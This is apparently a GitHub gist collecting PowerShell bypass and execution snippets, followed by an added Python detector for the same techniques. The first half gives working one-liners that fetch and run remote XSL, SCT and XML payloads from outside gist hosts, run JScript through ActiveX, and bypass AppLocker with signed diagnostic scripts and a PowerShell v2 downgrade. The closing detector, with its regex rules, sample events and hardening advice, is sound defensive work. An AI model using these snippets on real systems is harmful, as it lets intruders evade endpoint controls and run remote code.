@mgeeky
Created April 30, 2020 21:40
Snippets of PowerShell bypass/evasion/execution techniques that are interesting
##############################################################################
### Powershell Xml/Xsl Assembly "Fetch & Execute"
### [https://twitter.com/bohops/status/966172175555284992]
$s=New-Object System.Xml.Xsl.XsltSettings;$r=New-Object System.Xml.XmlUrlResolver;$s.EnableScript=1;$x=New-Object System.Xml.Xsl.XslCompiledTransform;$x.Load('https://gist.githubusercontent.com/bohops/ee9e2d7bdd606c264a0c6599b0146599/raw/f8245f99992eff00eb5f0d5738dfbf0937daf5e4/xsl-notepad.xsl',$s,$r);$x.Transform('https://gist.githubusercontent.com/bohops/ee9e2d7bdd606c264a0c6599b0146599/raw/f8245f99992eff00eb5f0d5738dfbf0937daf5e4/xsl-notepad.xml','z');del z;
##############################################################################
### Powershell VBScript Assembly SCT "Fetch & Execute"
### [https://twitter.com/bohops/status/965670898379476993]
[Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');[Microsoft.VisualBasic.Interaction]::GetObject('script:https://gist.githubusercontent.com/bohops/72031fecb0f58531753f51d4ef2b86e9/raw/805dcca541e6b5efa1420e8758eaea9c3487dcf0/notepad.sct').Exec(0)
##############################################################################
### Powershell JScript Assembly SCT "Fetch & Execute"
### [https://twitter.com/bohops/status/965085651199840258]
[Reflection.Assembly]::LoadWithPartialName('Microsoft.JScript');[Microsoft.JScript.Eval]::JScriptEvaluate('GetObject("script:https://gist.githubusercontent.com/bohops/72031fecb0f58531753f51d4ef2b86e9/raw/805dcca541e6b5efa1420e8758eaea9c3487dcf0/notepad.sct").Exec()',[Microsoft.JScript.Vsa.VsaEngine]::CreateEngine())
##############################################################################
### Powershell JScript Assembly ActiveXObject Script Execution
### [@gabemarshall - https://gist.githubusercontent.com/gabemarshall/a708aad5b70a31d0bec19b86a1b73c28/raw/44e74c465b5585dc7a941103aa8742b928933ccf/jscript.ps1]
[Reflection.Assembly]::LoadWithPartialName('Microsoft.JScript');$js = 'var js = new ActiveXObject("WScript.Shell");js.Run("calc");';[Microsoft.JScript.Eval]::JScriptEvaluate($js,[Microsoft.JScript.Vsa.VsaEngine]::CreateEngine());
##############################################################################
### Loading .Net/C# Assemblies to Bypass AppLocker Default Rules w/ PowerShell Diagnostic Scripts
### [https://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts/]
powershell -v 2 -ep bypass
cd C:\windows\diagnostics\system\AERO
import-module .\CL_LoadAssembly.ps1
LoadAssemblyFromPath ..\..\..\..\path\assembly.exe
[name.space]::executesomething()
##############################################################################
### Command Invocation w/ PowerShell Diagnostic Scripts
### [https://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts/]
powershell -v 2 -ep bypass
cd C:\windows\diagnostics\system\AERO
import-module CL_Invocation.ps1
SyncInvoke notepad.exe
##############################################################################
### PowerShell CL Download Cradle
### [@subtee - https://gist.github.com/subTee/47f16d60efc9f7cfefd62fb7a712ec8d]
### [@HarmJ0y - https://gist.github.com/HarmJ0y/bb48307ffa663256e239]
$a = New-Object System.Xml.XmlDocument
$a.Load("https://gist.githubusercontent.com/bohops/0e7f900bba16181f01575bdd43b383e9/raw/1d4913d032903f0aa9d8e9ab62891745ee814043/notepad.xml")
$a.command.a.execute | iex
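Every technique in this gist leaves a recognisable trace in PowerShell's own telemetry: the .NET type names and method calls land in Script Block Logging records (Event ID 4104 in Microsoft-Windows-PowerShell/Operational), and the `powershell -v 2` downgrade used with the diagnostic scripts shows up as an engine-lifecycle record (Event ID 400) whose EngineVersion is 2.0 while HostVersion is 5.x. The following detector is an added example written for this page from the defender's side; it is not part of the gist and not code by the snippet authors. The event records it scans are constructed samples, the `example.invalid` URLs are placeholders, and the rule names are my own. One block covers all five sections above, since the same scanner serves each of them.

```python
import re

# Constructed sample events (not real captured logs): the text of PowerShell
# ScriptBlock Logging records (Event ID 4104) plus two engine-lifecycle records
# (Event ID 400), as an analyst would see them after pulling them from the
# Microsoft-Windows-PowerShell/Operational log. URLs are placeholders.
SAMPLE_EVENTS = [
    {"id": 4104, "text": "Get-ChildItem C:\\Temp | Sort-Object Length"},
    {"id": 4104, "text": "$s=New-Object System.Xml.Xsl.XsltSettings;$s.EnableScript=1;"
                         "$x=New-Object System.Xml.Xsl.XslCompiledTransform;"
                         "$x.Load('https://example.invalid/t.xsl',$s,$r)"},
    {"id": 4104, "text": "[Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');"
                         "[Microsoft.VisualBasic.Interaction]::GetObject('script:https://example.invalid/n.sct').Exec(0)"},
    {"id": 4104, "text": "[Reflection.Assembly]::LoadWithPartialName('Microsoft.JScript');"
                         "[Microsoft.JScript.Eval]::JScriptEvaluate($js,[Microsoft.JScript.Vsa.VsaEngine]::CreateEngine())"},
    {"id": 4104, "text": "import-module .\\CL_LoadAssembly.ps1; LoadAssemblyFromPath ..\\..\\..\\..\\tmp\\a.exe"},
    {"id": 4104, "text": "$a = New-Object System.Xml.XmlDocument; $a.Load('https://example.invalid/c.xml'); "
                         "$a.command.a.execute | iex"},
    {"id": 400, "text": "Engine state is changed from None to Available. "
                        "HostName=ConsoleHost HostVersion=5.1.19041.1 EngineVersion=2.0"},
    {"id": 400, "text": "Engine state is changed from None to Available. "
                        "HostName=ConsoleHost HostVersion=5.1.19041.1 EngineVersion=5.1.19041.1"},
]

# Detection rules (hypothetical names chosen for this example): one per technique
# in the gist, each bound to the event ID it applies to. Multi-condition rules use
# lookaheads so the order of statements in the script block does not matter.
RULES = [
    # XsltSettings with EnableScript turned on: script-enabled XSL transform
    ("xsl-script-transform", 4104,
     r"(?=.*\bXsltSettings\b)(?=.*\bEnableScript\s*=\s*(?:1|\$true))"),
    # "script:" moniker handed to GetObject (VBScript or JScript flavour)
    ("scriptlet-moniker", 4104,
     r"GetObject\(\s*['\"]script:"),
    # JScript engine driven from PowerShell
    ("jscript-eval-engine", 4104,
     r"Microsoft\.JScript\.(?:Eval|Vsa\.VsaEngine)|\bJScriptEvaluate\b"),
    # Signed diagnostic helper scripts imported outside a troubleshooting pack
    ("diagnostic-script-abuse", 4104,
     r"CL_(?:LoadAssembly|Invocation)\.ps1|\bLoadAssemblyFromPath\b|\bSyncInvoke\b"),
    # XmlDocument loaded from a URL and piped into iex / Invoke-Expression
    ("xml-download-cradle", 4104,
     r"(?=.*\bXmlDocument\b)(?=.*\.Load\(\s*['\"]https?://)(?=.*\b(?:iex|Invoke-Expression)\b)"),
    # Engine 2.0 started by a newer host: the -v 2 downgrade
    ("engine-downgrade", 400,
     r"(?=.*\bHostVersion=(?!2\.)\d)(?=.*\bEngineVersion=2\.0\b)"),
]

COMPILED = [(name, eid, re.compile(pat, re.I | re.S)) for name, eid, pat in RULES]


def match_rules(event):
    """Return the names of every rule that fires on one event record."""
    return [name for name, eid, rx in COMPILED
            if event["id"] == eid and rx.search(event["text"])]


def scan_events(events):
    """Return {event_index: [rule names]} for each event that triggers at least one rule."""
    hits = {}
    for i, ev in enumerate(events):
        names = match_rules(ev)
        if names:
            hits[i] = names
    return hits


if __name__ == "__main__":
    for i, names in scan_events(SAMPLE_EVENTS).items():
        print(f"event {i} (id {SAMPLE_EVENTS[i]['id']}): {', '.join(names)}")
```

Two caveats for anyone wiring this into a real pipeline. First, the v2 engine produces no 4104 records at all, which is exactly why the downgrade matters; the Event ID 400 rule is the only one of the six that catches the diagnostic-script sections when they are run as the gist shows them, so both event IDs need to be collected. Second, these are literal string rules and will miss obfuscated variants, so treat them as a starting point and pair them with the structural fix: removing the Windows PowerShell 2.0 optional feature (`Disable-WindowsOptionalFeature -Online -FeatureName MicrosoftWindowsPowerShellV2Root`) takes away the engine the downgrade depends on.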